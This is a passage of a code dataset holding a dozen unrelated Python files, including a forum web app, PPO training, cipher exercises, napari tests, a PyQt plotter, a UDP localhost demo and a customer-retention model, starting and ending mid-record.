self.template_out(\"skins/default/topic.html\", tvals)\n\n# responds to //move?id=\nclass MoveTopic(webapp.RequestHandler):\n\n def post(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n\n # Only admins can move topics\n if not forum or not is_admin:\n return self.redirect(\"/\")\n\n try:\n forumto = Forum.from_url(self.request.get('forumto'))\n topic = db.get( db.Key.from_path( 'Topic', int(self.request.get('id')) ) )\n except ValueError:\n return self.redirect(forum.root())\n\n if topic and forumto:\n topic.forum = forumto\n topic.put()\n forum.num_topics -= 1\n forum.num_posts -= topic.ncomments\n forum.put()\n forumto.num_topics += 1\n forumto.num_posts += topic.ncomments\n forumto.put()\n\n return self.redirect(forum.root())\n\n# Responds to //post[?id=]\nclass PostForm(FofouBase):\n def get(self):\n is_admin = users.is_current_user_admin()\n forum = Forum.from_url(self.request.path_info)\n user = users.get_current_user()\n \n if not forum or (forum.is_disabled and not is_admin):\n return self.redirect(\"/\")\n \n if not is_admin and not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n\n if not is_admin and not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n \n # Get user either by google user id or cookie\n if user:\n fuser = FofouUser.gql(\"WHERE user = :1\", user).get()\n else: \n fuser = FofouUser.gql(\"WHERE cookie = :1\", self.cookie ).get()\n\n tvals = {\n 'user': user,\n 'isadmin': is_admin,\n 'forum': forum,\n 'fuser': fuser or {\n 'email': user.email() if user else \"\",\n 'name': user.nickname() if user else \"\",\n 'remember_me': True\n },\n 'post': { 'subject': '' },\n 'login_url' : users.create_login_url(self.request.url),\n 'logout_url' : users.create_logout_url(self.request.url)\n }\n \n topic_id = self.request.get('id')\n if topic_id:\n tvals['topic'] = db.get(db.Key.from_path('Topic', int(topic_id)))\n if not tvals['topic']:\n return self.redirect( forum.root() )\n\n self.template_out(\"skins/default/post.html\", tvals)\n\n def post(self):\n forum = Forum.from_url(self.request.path_info)\n is_admin = users.is_current_user_admin()\n user = users.get_current_user()\n \n if not forum or (forum.is_disabled and not is_admin):\n return self.redirect(\"/\")\n\n if not is_admin and not self.settings.check_ip(self.request.remote_addr):\n return self.response.out.write('Your IP address has been banned')\n\n if not is_admin and not self.settings.check_user( user ):\n return self.redirect( users.create_login_url(\"/\") )\n\n name = self.request.get('name').strip()\n email = self.request.get('email').strip()\n subject = self.request.get('subject').strip()\n message = to_unicode( self.request.get('message') ).strip()\n homepage = self.request.get('homepage').strip()\n homepage = \"\" if homepage == \"http://\" else homepage\n remember = bool(self.request.get('remember'))\n \n try: \n topic_id = int( self.request.get('topic_id') or 0 )\n if topic_id:\n topic = db.get(db.Key.from_path('Topic', topic_id))\n else:\n topic = None\n except ValueError:\n topic = None\n \n if topic and topic.is_locked:\n return self.redirect( \"%stopic?id=%s\" % (forum.root(), topic.id) )\n \n # Perform simple validation\n errors = { 'valid': True }\n \n # First post must have a subject\n if not topic and not subject: \n errors['valid'] = False\n errors['subject'] = \"Subject required for new topic\"\n \n if not message:\n errors['valid'] = False\n errors['message'] = \"Message is required\"\n \n # sha.new() doesn't accept Unicode strings, so convert to utf8 first\n sha1_digest = sha.new( message.encode('UTF-8') ).hexdigest()\n if Post.gql(\"WHERE sha1_digest = :1 AND topic = :2\", sha1_digest, topic).get():\n errors['valid'] = False\n errors['message'] = \"This is a duplicate post\"\n\n if not errors['valid']:\n return self.template_out(\"skins/default/post.html\", {\n 'isadmin': is_admin,\n 'user': user,\n 'errors': errors,\n 'forum': forum,\n 'topic': topic and { 'id': topic_id, 'subject': topic.subject },\n 'post': { 'message': message, 'subject': subject },\n 'fuser': { 'name': name, 'email': email, 'homepage': homepage, 'remember_me': remember }\n })\n\n # Get user either by google user id or cookie. Create user objects if don't already exist \n\n if user:\n fuser = FofouUser.gql(\"WHERE user = :1\", user).get()\n else: \n fuser = FofouUser.gql(\"WHERE cookie = :1\", self.cookie).get()\n\n if not fuser:\n fuser = FofouUser(\n user = user or users.User('anonymous@example.com'),\n remember_me = remember, \n email = email or 'anonymous@example.com', \n name = name or 'Anonymous', \n homepage = homepage,\n cookie = self.cookie )\n else:\n fuser.remember_me = remember\n fuser.email = email or 'anonymous@example.com'\n fuser.name = name or 'Anonymous'\n fuser.homepage = homepage\n\n if not topic:\n topic = Topic(forum=forum, subject=subject, created_by=fuser.name)\n forum.num_topics += 1\n else:\n topic.ncomments += 1\n forum.num_posts += 1\n \n topic.put()\n fuser.put()\n \n post = Post(\n topic = topic, \n user = fuser, \n user_ip = self.request.remote_addr, \n message = message, \n sha1_digest = sha1_digest, \n user_name = fuser.name,\n user_email = fuser.email,\n user_homepage = homepage\n )\n \n post.put()\n forum.put()\n\n self.redirect( \"%stopic?id=%s\" % (forum.root(), topic.id) )\n\nif __name__ == \"__main__\":\n wsgiref.handlers.CGIHandler().run( webapp.WSGIApplication( routes, [\n ('/', ForumList),\n ('/manageforums', ManageForums),\n ('/managesettings', ManageSettings),\n ('/[^/]+/delete', DeleteTopic),\n ('/[^/]+/lock', LockTopic),\n ('/[^/]+/post', PostForm),\n ('/[^/]+/move', MoveTopic),\n ('/[^/]+/topic', TopicForm),\n ('/[^/]+/?', TopicList)], debug=DEBUG))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"424941973","text":"import numpy as np\nimport torch\nimport gym\nfrom ppo.PPO import PPO, Memory\nfrom ppo.utils import ReplayBuffer\nfrom env_exp import SocTwoEnv\n\nenv_path = './env/macos/SoccerTwosFast.app'\nenv = SocTwoEnv(env_path, worker_id=0, train_mode=True)\n\n############## Hyperparameters Striker ##############\nstate_dim_striker = 112\naction_dim_striker = 7\nn_latent_var_striker = 64 # number of variables in hidden layer\n#############################################\n\n############## Hyperparameters Goalie ##############\nstate_dim_goalie = 112\naction_dim_goalie = 5\nn_latent_var_goalie = 64 # number of variables in hidden layer\n#############################################\n\n\nmax_episodes = 50000 # max training episodes\nmax_timesteps = 300 # max timesteps in one episode\nsolved_reward = 230 # stop training if avg_reward > solved_reward\nlog_interval = 100 # print avg reward in the interval\nupdate_timestep = 200 # update policy every n timesteps 2000\nlr = 0.001\ngamma = 0.99 # discount factor\nK_epochs = 4 # update policy for K epochs\neps_clip = 0.2 # clip parameter for PPO\nrandom_seed = None\n\nif random_seed:\n torch.manual_seed(random_seed)\n env.seed(random_seed)\n\nmemory_striker = Memory()\nppo_striker = PPO(state_dim_striker, action_dim_striker, n_latent_var_striker,\n lr, gamma, K_epochs, eps_clip)\n\nmemory_goalie = Memory()\nppo_goalie = PPO(state_dim_goalie, action_dim_goalie, n_latent_var_goalie, lr,\n gamma, K_epochs, eps_clip)\n\n# logging variables\nrunning_reward = 0\navg_length = 0\ntimestep = 0\n\n# training loop\nstate_striker, state_goalie = env.reset()\nfor i_episode in range(1, max_episodes + 1):\n for t in range(max_timesteps):\n timestep += 1\n\n # Running policy_old:\n action_striker = ppo_striker.policy_old.act(state_striker, memory_striker)\n action_goalie = ppo_goalie.policy_old.act(state_goalie, memory_goalie)\n states, reward, done, _ = env.step(action_striker, action_goalie)\n print(np.argwhere(done))\n # Saving reward:\n memory_striker.update_reward(reward[0])\n memory_goalie.update_reward(reward[1])\n\n # update if its time\n if timestep % update_timestep == 0:\n ppo_striker.update(memory_striker)\n memory_striker.clear_memory()\n\n ppo_goalie.update(memory_goalie)\n memory_goalie.clear_memory()\n\n timestep = 0\n\n running_reward += max(reward[0])\n\n\n avg_length += t\n\n # stop training if avg_reward > solved_reward\n if running_reward > (log_interval * solved_reward):\n print(\"########## Solved! ##########\")\n torch.save(ppo_striker.policy.state_dict(),\n './PPO_{}.pth'.format('SoccerTwos'))\n break\n\n # logging\n if i_episode % log_interval == 0:\n avg_length = int(avg_length / log_interval)\n running_reward = int((running_reward / log_interval))\n\n print('Episode {} \\t avg length: {} \\t reward: {}'.format(\n i_episode, avg_length, running_reward))\n running_reward = 0\n avg_length = 0","sub_path":"main_ppo.py","file_name":"main_ppo.py","file_ext":"py","file_size_in_byte":3117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"40506451","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index),\n path('home', views.index, name='home'),\n path('overview', views.overview, name='overview'),\n path('skills', views.skills, name='skills'),\n path('about', views.about, name='about'),\n]","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"465450716","text":"from Ceasarscipher import caesar_cipher\nfrom AbtashCipher import atbash\nfrom ColumnarTranspositionCipher import transpositionCipher\nfrom PlayfairCipher import playfair_cipher\n\nch=1\nwhile ch!=0:\n print(\"(1) Ceasar's Cipher\") #Do not forget to add the encryption method option\n print(\"(2) Atbash Cipher\") # in the menu\n print(\"(3) ColumnarTranspositionCipher\")\n print(\"(4) Playfair Cipher\")\n print(\"(5) Reverse Cipher\")\n print(\"(0) Exit Menu\")\n ch = int(input(\"Enter Encryption choice (1/2/3/4/5/0): \")) #Also update the choices here\n if ch==1:\n s=input(\"Enter String: \")\n k=int(input(\"Enter the shift value: \"))\n s=caesar_cipher(s, k)\n print(s)\n \n elif ch==2:\n string=input(\"Enter String: \")\n string=atbash(string)\n print(string)\n\n elif ch==3:\n message = input(\"Enter Message: \")\n key = int(input(\"Enter key: \"))\n message = transpositionCipher(key,message) \n print(message) \n \n elif ch == 4:\n string = input(\"Enter string:\")\n key = input(\"Enter the key (a string):\")\n print(playfair_cipher(string,key))\n \n elif ch==5:\n message = input(\"Enter your message: \")\n print(Reverse_cipher(message))\n \n","sub_path":"EncryptMethods.py","file_name":"EncryptMethods.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"455668791","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (c) 2021 Huawei Device Co., Ltd.\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\nimport sys\n\n\ndef main():\n if (len(sys.argv) != 2):\n sys.stderr.write(\"MUST have 1 parameter for the searching path\")\n sys.stderr.write(os.linesep)\n exit(os.errno.EINVAL)\n\n base_dir = os.path.realpath(sys.argv[1])\n if (not os.path.isdir(base_dir)):\n sys.stderr.write(\"Searching path MUST be a directory\")\n sys.stderr.write(os.linesep)\n exit(os.errno.EINVAL)\n\n for item in os.listdir(base_dir):\n if not os.path.isdir(os.path.join(base_dir, item)):\n continue\n\n file_path = os.path.join(base_dir, item, \"build\", \"platform.gni\")\n if not os.path.isfile(file_path):\n continue\n\n sys.stdout.write(item)\n sys.stdout.write(os.linesep)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"build/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"524267263","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 6 16:30:40 2014\n\n@author: napopa\n\"\"\"\n\ndef detect_anagrams(word,sentence):\n list_sentence = list(sentence)\n print(list_sentence)\n sorted_word = ''.join(sorted(word.lower()))\n print(sorted_word)\n result = [] \n \n for var in list_sentence:\n if ''.join(sorted(var.lower())) == sorted_word and var.lower() != word.lower():\n result.append(var)\n return result\n","sub_path":"all_data/exercism_data/python/anagram/815cb0a799ee438aaac90738f31db457.py","file_name":"815cb0a799ee438aaac90738f31db457.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"66903640","text":"import numpy as np\nimport pytest\n\nfrom napari.layers.shapes._shape_list import ShapeList\nfrom napari.layers.shapes._shapes_models import Path, Polygon, Rectangle\n\n\ndef test_empty_shape_list():\n \"\"\"Test instantiating empty ShapeList.\"\"\"\n shape_list = ShapeList()\n assert len(shape_list.shapes) == 0\n\n\ndef test_adding_to_shape_list():\n \"\"\"Test adding shapes to ShapeList.\"\"\"\n np.random.seed(0)\n data = 20 * np.random.random((4, 2))\n shape = Rectangle(data)\n shape_list = ShapeList()\n\n shape_list.add(shape)\n assert len(shape_list.shapes) == 1\n assert shape_list.shapes[0] == shape\n\n\ndef test_nD_shapes():\n \"\"\"Test adding shapes to ShapeList.\"\"\"\n np.random.seed(0)\n shape_list = ShapeList()\n data = 20 * np.random.random((6, 3))\n data[:, 0] = 0\n shape_a = Polygon(data)\n shape_list.add(shape_a)\n\n data = 20 * np.random.random((6, 3))\n data[:, 0] = 1\n shape_b = Path(data)\n shape_list.add(shape_b)\n\n assert len(shape_list.shapes) == 2\n assert shape_list.shapes[0] == shape_a\n assert shape_list.shapes[1] == shape_b\n\n assert shape_list._vertices.shape[1] == 2\n assert shape_list._mesh.vertices.shape[1] == 2\n\n shape_list.ndisplay = 3\n assert shape_list._vertices.shape[1] == 3\n assert shape_list._mesh.vertices.shape[1] == 3\n\n\n@pytest.mark.parametrize(\"attribute\", ['edge', 'face'])\ndef test_bad_color_array(attribute):\n \"\"\"Test adding shapes to ShapeList.\"\"\"\n np.random.seed(0)\n data = 20 * np.random.random((4, 2))\n shape = Rectangle(data)\n shape_list = ShapeList()\n\n shape_list.add(shape)\n\n # test setting color with a color array of the wrong shape\n bad_color_array = np.array([[0, 0, 0, 1], [1, 1, 1, 1]])\n with pytest.raises(ValueError):\n setattr(shape_list, f'{attribute}_color', bad_color_array)\n","sub_path":"napari/layers/shapes/_tests/test_shape_list.py","file_name":"test_shape_list.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94898303","text":"from __future__ import with_statement\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nfrom PyQt5 import QtCore\nfrom PyQt5.QtCore import QRect, pyqtSignal\nfrom PyQt5 import QtGui\nfrom PlotUI import Ui_PlotUIWindow\nfrom PGraph import Ui_PGraph\nfrom OpenDialog import Ui_Dialog\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QFileDialog, QColorDialog, QWidget\n\nclass DesignerMainWindow(QMainWindow, Ui_PlotUIWindow,QtCore.QObject):\n def __init__(self,parent=None):\n super(DesignerMainWindow,self).__init__(parent)\n self.setupUi(self)\n self.tabWidget.clear()\n self.actionOpen.triggered.connect(self.on_actionOpen)\n self.applyButton.clicked.connect(self.on_apply)\n self.actionSave.triggered.connect(self.on_actionSave)\n self.actionSaveAs.triggered.connect(self.on_actionSaveAs)\n self.fileSaveName = \"\"\n self.graphDictionary = {}\n self.tabCount = 0\n self.openDialog = \"\"\n\n\n def on_actionOpen(self):\n self.openDialog = OpenDialog()\n self.openDialog.show()\n self.openDialog.drawSignal.connect(self.on_draw)\n\n def on_draw(self,fileName,name):\n graph = PGraph(fileName)\n self.tabWidget.addTab(graph,name)\n self.graphDictionary[self.tabCount] = graph\n self.plot()\n self.tabCount += 1\n\n def plot(self):\n for val in self.graphDictionary.values():\n x, y = np.loadtxt(val.file).T\n if val.plotStyleColor:\n self.mpl.canvas.ax.plot(x, y, color=val.plotStyleColor,label=val.label)\n else:\n self.mpl.canvas.ax.plot(x, y,label=val.label)\n if self.x_label:\n self.mpl.canvas.ax.set_xlabel(self.x_lineEdit.text())\n if self.y_label:\n self.mpl.canvas.ax.set_ylabel(self.y_lineEdit.text())\n if self.legendCheckBox.isChecked() == True:\n self.mpl.canvas.ax.legend(loc='best')\n self.mpl.canvas.draw()\n\n def on_apply(self):\n self.mpl.canvas.ax.clear()\n self.plot()\n\n def on_save(self):\n if self.fileSaveName:\n self.mpl.canvas.fig.savefig(self.fileSaveName)\n else:\n self.on_actionSaveAs()\n\n def on_actionSave(self):\n self.on_save()\n\n def on_actionSaveAs(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getSaveFileName(self, \"Save File\", \"\",\n \"Images (*.png *.jpg)\", options=options)\n if fileName:\n self.fileSaveName = fileName\n self.mpl.canvas.fig.savefig(self.fileSaveName)\n\n def on_color(self):\n color = QColorDialog.getColor()\n self.plotStyleColor = tuple(t/255 for t in color.getRgb())\n\nclass PGraph(QWidget,Ui_PGraph,QtCore.QObject):\n def __init__(self, fileName, parent=None):\n super(PGraph,self).__init__(parent)\n self.setupUi(self)\n self.file = fileName\n self.plotStyleColor = \"\"\n self.selectedColorButton.setEnabled(False)\n self.colorButton.clicked.connect(self.on_color)\n self.label = \"label\"\n\n def on_color(self):\n color = QColorDialog.getColor()\n self.selectedColorButton.setStyleSheet(\"background-color: \" + color.name())\n self.plotStyleColor = tuple(t/255 for t in color.getRgb())\n\n def setPlotStyleColor(self, color):\n self.plotStyleColor = color\n\n\nclass OpenDialog(QWidget,Ui_Dialog,QtCore.QObject):\n drawSignal = pyqtSignal(str,str)\n\n def __init__(self,parent=None):\n super(OpenDialog,self).__init__(parent)\n self.setupUi(self)\n self.fileName = \"\"\n self.plotStyleColor = \"\"\n self.selectedColor.setEnabled(False)\n self.searchButton.clicked.connect(self.on_search)\n self.colorButton.clicked.connect(self.on_color)\n self.drawButton.clicked.connect(self.on_draw)\n\n\n\n def on_color(self):\n color = QColorDialog.getColor()\n self.selectedColor.setStyleSheet(\"background-color: \" + color.name())\n self.plotStyleColor = tuple(t / 255 for t in color.getRgb())\n\n\n def on_search(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"Open File\", \"\",\n \"Text files (*.txt)\", options=options)\n if fileName:\n self.pathLineEdit.setText(fileName)\n self.fileName = fileName\n\n def on_draw(self):\n if self.nameLineEdit.text() != \"\":\n self.drawSignal.emit(self.fileName,self.nameLineEdit.text())\n else:\n self.drawSignal.emit(self.fileName,self.fileName)\n self.close()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# create the GUI application\napp = QApplication(sys.argv)\n# instantiate the main window\ndmw = DesignerMainWindow()\n# show it\ndmw.showMaximized()\n# start the Qt main loop execution, exiting from this script\n# with the same return code of Qt application\nsys.exit(app.exec_())\n","sub_path":"PlotUI/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418611308","text":"# coding: utf-8\nfrom bs4 import BeautifulSoup as bs\nimport requests\nimport csv\n\nfilename = 'active_hackerspaces_with_e-mail_0501-1000.csv'\n\n# url = 'https://wiki.hackerspaces.org/Special:Ask/-5B-5BCategory:Hackerspace-5D-5D/-3F=Hackerspace-23/-3F=Hackerspace-23/-3F=Hackerspace-23/-3FCountry/-3FState/-3FCity/-3FWebsite/-3FDate-20of-20founding/-3FHackerspace-20status/format=broadtable/limit=10/sort=Country/mainlabel=Hackerspace/offset=300'\n\n#url = 'https://wiki.hackerspaces.org/w/index.php?title=Special%3AAsk&q=%5B%5BCategory%3AHackerspace%5D%5D+%5B%5BHackerspace+status%3A%3Aactive%5D%5D+%5B%5BE-mail%3A%3A%2B%5D%5D&po=%3F%3DHackerspace%23%0D%0A%3FCountry%0D%0A%3FState%0D%0A%3FCity%0D%0A%3FWebsite%0D%0A%3FDate+of+founding%0D%0A%3FHackerspace+status%0D%0A%3FEmail%0D%0A&eq=yes&p%5Bformat%5D=broadtable&sort_num=&order_num=ASC&p%5Blimit%5D=5&p%5Boffset%5D=&p%5Blink%5D=all&p%5Bsort%5D=Country&p%5Bheaders%5D=show&p%5Bmainlabel%5D=Hackerspace&p%5Bintro%5D=&p%5Boutro%5D=&p%5Bsearchlabel%5D=...+further+results&p%5Bdefault%5D=&p%5Bclass%5D=sortable+wikitable+smwtable&eq=yes'\n\nurl = 'https://wiki.hackerspaces.org/w/index.php?title=Special:Ask&q=%5B%5BCategory%3AHackerspace%5D%5D+%5B%5BHackerspace+status%3A%3Aactive%5D%5D+%5B%5BE-mail%3A%3A%2B%5D%5D&p=format%3Dbroadtable%2Flink%3Dall%2Fheaders%3Dshow%2Fmainlabel%3DHackerspace%2Fsearchlabel%3D...-20further-20results%2Fclass%3Dsortable-20wikitable-20smwtable&po=%3F%3DHackerspace%23%0A%3FCountry%0A%3FState%0A%3FCity%0A%3FWebsite%0A%3FDate+of+founding%0A%3FHackerspace+status%0A%3FEmail%0A&sort=Country&limit=500&eq=no&offset=500'\n\nr = requests.get(url)\nsoup = bs(r.text, 'html.parser')\nt = soup.table\n\nclasses = 'Hackerspace,Hackerspace#,Country,State,City,Website,Date-of-founding,Hackerspace-status,Email'.split(',')\n\nwith open(filename, 'w', newline='') as csvfile:\n mywriter = csv.writer(csvfile, delimiter=',', quotechar='\\'', quoting=csv.QUOTE_MINIMAL)\n # escreve os nomes dos campos no cabeçalho do arquivo csv\n mywriter.writerow(classes) #+ ['data-sort-value'])\n\n trs = t.find_all('tr')\n\n for tr in trs:\n current_line = []\n tds = tr.find_all('td')\n for i in range(len(classes)):\n current_line.append(tds[i].text)\n mywriter.writerow(current_line)\n\n","sub_path":"1_from_hackerspaces_org/hs_scrap_to_file.py","file_name":"hs_scrap_to_file.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"256954377","text":"# Eibhinn Lee\n# Calculating the BMI \n# weight in Kg\n# Height in metres\n\nw = 65\nh = 1.80\n\n# BMI = kg/metre sq\n\nsqmetres = (h**2)\n# BMI = x\n\nx = (w/sqmetres)\n\nprint(\"BMI of a person 65kg and 180 centimeters tall is\",x)\n\n","sub_path":"BMI.py","file_name":"BMI.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"401590165","text":"# each possibility (from at least COMEDY, MUSICAL and HORROR\n\n# An example run of the program (words in bold are typed in by the user and pop-up boxes may be used for input / output)\n\n\n# options\n\n# comedy\n# musical\n# action\n# horror\n\n\ncomedy = input(\"Would you like to see a comedy: \")\ncomedy = comedy.upper()\n\n # my error came as I did not ressasign the value to comedy.\n\n # I was doing comedy.upper()\n\n # this does not affect the 'comedy' variable, as it still contains it's original value.\n \n\nif comedy.upper() == 'YES' or comedy.upper() == 'Y': #in python, you must use the terms or, and (not && ||) and you must repeat the variable name again, when you are comparing another variable within the if statement, or the program would produce logical errors.\n print('You may want to watch big momma\\'s house or big daddy!')\n\nelif comedy.upper() == 'NO' or comedy.upper() == 'N':\n musical = input(\"Would you like to see a musical: \")\n\n if musical.upper() == 'YES' or musical.upper() == 'Y':\n print(\"You may want to watch les miserables or the lion king!\")\n\n elif musical.upper() == 'NO' or musical.upper() == 'N':\n action = input(\"Would you like to see an action film: \")\n\n if action.upper() == 'YES' or action.upper() == 'Y':\n print(\"You may want to watch spiderman or the incredible hulk!\")\n else:\n print(\"You can't please them all\")\n else:\n print(\"Please write yes or no! - musical else\")\nelse:\n print(\"Please write yes or no!\")\n","sub_path":"beginners/exercise12-16/theatreshows.py","file_name":"theatreshows.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"599921014","text":"#!/usr/bin/env python\n# Foundations of Python Network Programming - Chapter 2\n# udp_local.py\n# UDP client and server on localhost\n# Converted to Python3 by David Branner, 20140709, works.\n\nimport socket, sys\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nMAX = 65535\nPORT = 1060\n\nif sys.argv[1:] == ['server']:\n s.bind(('127.0.0.1', PORT))\n print('Listening at {}'.format(s.getsockname()))\n while True:\n data, address = s.recvfrom(MAX)\n print('The client at {} says {}'.\n format(address, str(data, 'utf-8')))\n s.sendto(bytes('Your data was {} bytes'.format(len(data)), 'utf-8'),\n address)\n\nelif sys.argv[1:] == ['client']:\n print('Address before sending: {}'.format(s.getsockname()))\n s.sendto(b'This is my message', ('127.0.0.1', PORT))\n print('Address after sending: {}'.format(s.getsockname()))\n data, address = s.recvfrom(MAX) # overly promiscuous - see text!\n print('The server {} says {}'.\n format(address, str(data, 'utf-8')))\n\nelse:\n sys.stderr.write('usage: udp_local.py server|client\\n')\n","sub_path":"rhodes_goerzen_foundations_py3k/udp_local.py","file_name":"udp_local.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"336807984","text":"\"\"\"\nImplementation of the shifted beta geometric (sBG) model from \"How to Project Customer Retention\" (Fader and Hardie 2006)\n\nhttp://www.brucehardie.com/papers/021/sbg_2006-05-30.pdf\n\nApache 2 License\n\"\"\"\n\nfrom math import log\n\nimport numpy as np\n\nfrom scipy.optimize import minimize\nfrom scipy.special import hyp2f1\n\n__author__ = \"JD Maturen\"\n\n\ndef generate_probabilities(alpha, beta, x):\n \"\"\"Generate probabilities in one pass for all t in x\"\"\"\n p = [alpha / (alpha + beta)]\n for t in range(1, x):\n pt = (beta + t - 1) / (alpha + beta + t) * p[t - 1]\n p.append(pt)\n return p\n\n\ndef probability(alpha, beta, t):\n \"\"\"Probability function P\"\"\"\n if t == 0:\n return alpha / (alpha + beta)\n return (beta + t - 1) / (alpha + beta + t) * probability(alpha, beta, t - 1)\n\n\ndef survivor(probabilities, t):\n \"\"\"Survivor function S\"\"\"\n s = 1 - probabilities[0]\n for x in range(1, t + 1):\n s = s - probabilities[x]\n return s\n\n\ndef log_likelihood(alpha, beta, data, survivors=None):\n \"\"\"Function to maximize to obtain ideal alpha and beta parameters\"\"\"\n if alpha <= 0 or beta <= 0:\n return -1000\n if survivors is None:\n survivors = survivor_rates(data)\n probabilities = generate_probabilities(alpha, beta, len(data))\n final_survivor_likelihood = survivor(probabilities, len(data) - 1)\n\n return sum([s * log(probabilities[t]) for t, s in enumerate(survivors)]) + data[-1] * log(\n final_survivor_likelihood\n )\n\n\ndef log_likelihood_multi_cohort(alpha, beta, data):\n \"\"\"Function to maximize to obtain ideal alpha and beta parameters using data across multiple (contiguous) cohorts.\n `data` must be a list of cohorts each with an absolute number per observed time unit.\"\"\"\n if alpha <= 0 or beta <= 0:\n return -1000\n probabilities = generate_probabilities(alpha, beta, len(data[0]))\n\n cohorts = len(data)\n total = 0\n for i, cohort in enumerate(data):\n total += sum(\n [(cohort[j] - cohort[j + 1]) * log(probabilities[j]) for j in range(len(cohort) - 1)]\n )\n total += cohort[-1] * log(survivor(probabilities, cohorts - i - 1))\n return total\n\n\ndef survivor_rates(data):\n s = []\n for i, x in enumerate(data):\n if i == 0:\n s.append(1 - data[0])\n else:\n s.append(data[i - 1] - data[i])\n return s\n\n\ndef maximize(data):\n survivors = survivor_rates(data)\n func = lambda x: -log_likelihood(x[0], x[1], data, survivors)\n x0 = np.array([100.0, 100.0])\n res = minimize(func, x0, method=\"nelder-mead\", options={\"xtol\": 1e-8})\n return res\n\n\ndef maximize_multi_cohort(data):\n func = lambda x: -log_likelihood_multi_cohort(x[0], x[1], data)\n x0 = np.array([1.0, 1.0])\n res = minimize(func, x0, method=\"nelder-mead\", options={\"xtol\": 1e-8})\n return res\n\n\ndef predicted_retention(alpha, beta, t):\n \"\"\"Predicted retention probability at t. Function 8 in the paper\"\"\"\n return (beta + t) / (alpha + beta + t)\n\n\ndef predicted_survival(alpha, beta, x):\n \"\"\"Predicted survival probability, i.e. percentage of customers retained, for all t in x.\n Function 1 in the paper\"\"\"\n s = [predicted_retention(alpha, beta, 0)]\n for t in range(1, x):\n s.append(predicted_retention(alpha, beta, t) * s[t - 1])\n return s\n\n\ndef fit(data):\n res = maximize(data)\n if res.status != 0:\n raise Exception(res.message)\n return res.x\n\n\ndef fit_multi_cohort(data):\n res = maximize_multi_cohort(data)\n if res.status != 0:\n raise Exception(res.message)\n return res.x\n\n\ndef derl(alpha, beta, d, n):\n \"\"\"discounted expected residual lifetime from \"Customer-Base Valuation in a Contractual Setting: The Perils of\n Ignoring Heterogeneity\" (Fader and Hardie 2009)\"\"\"\n return predicted_retention(alpha, beta, n) * hyp2f1(\n 1, beta + n + 1, alpha + beta + n + 1, 1 / (1 + d)\n )\n\n\ndef predict_with_terminal_churn(data, future_periods, max_terminal_renewal=0.98):\n \"\"\"\n For data with duplicate values such as this:\n 0.695652174 0.695652174 0.304347826 0.130434783\n\n The sBG method breaks down, here will just use\n the terminal churn method, where the renewal rate in the future\n equals the last known renewal rate\n \"\"\"\n\n future_data = data.copy()\n\n terminal_renewal_rate = min(data[-1] / data[-2], max_terminal_renewal)\n last_value = data[-1]\n for i in range(future_periods):\n next_value = last_value * terminal_renewal_rate\n last_value = next_value\n future_data.append(next_value)\n\n return future_data\n\n\ndef apply_smoothing(data, predicted_data):\n \"\"\"\n For some predictions the first N predicted values are higher than the\n last known value, which cannot happen in reality with retention data.\n\n Example:\n\n A B C\n Known Known Predicted Predicted\n 0.12342216 0.119615308 0.135569514 0.132488536\n\n This smoothing method adjusts all future predictions down by:\n C - (B/A) * B\n\n The idea here is that (B/A) * B is our expected next period value, but C is our\n next value from the curve. Adjust the whole curve down by the difference of those\n values\n\n \"\"\"\n\n last_known_datapoint = data[-1]\n first_predicted_datapoint = predicted_data[len(data)]\n\n if first_predicted_datapoint 